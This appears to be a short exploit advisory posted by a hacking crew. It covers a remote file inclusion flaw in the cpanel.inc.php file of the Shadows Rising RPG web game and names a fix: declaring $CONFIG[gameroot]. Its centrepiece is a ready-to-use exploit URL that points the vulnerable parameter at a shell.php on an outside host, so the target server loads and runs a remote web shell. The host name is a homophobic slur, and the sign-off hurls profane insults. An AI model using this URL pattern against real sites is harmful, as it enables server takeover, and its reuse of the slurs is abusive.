Shadows Rising RPG is vulnerable to remote file inclusion in cpanel.inc.php
07c0d038cb71d8594974ea828297f117a94c74f3e051f9ef3123eb3083236472
<div id="_htmlarea_default_style_" style="font:10pt arial,helvetica,sans-serif"><pre>###### ToXiC #########################<br># <br>#Shadows Rising RPG Remote File Include<br>#<br>#BuG FounD by Drago84<br>#<br>#Application Affect: Shadows Rising RPG<br>#Source Code:<br>#http://prdownloads.sourceforge.net/shadowsrising/Shadows_Rising_RPG-0.0.4c.tar.bz2?use_mirror=umn<br>#Problem:<br># $CONFIG[gameroot] Not Declare<br>#Solution : Declare $CONFIG[gameroot]<br>#Page Vulnerable : cpanel.inc.php<br>#Dir : /core/cpanel/<br><br># Exempe Of ExPloit<br>is:<br>#http://www.site.com/shadow_dir/core/cpanel/cpanel.inc.php?CONFIG[gameroot]<br>=http://marcusbestlamer.gay/shell.php?<br><br>#GrEatZ All Member of ToXiC, Str0ke<br># Fuck Sonic Il chan italiano + merdoso che esista<br># ToXic Security Italian CreW<br><br>######
ToXiC<br>###################</pre></div>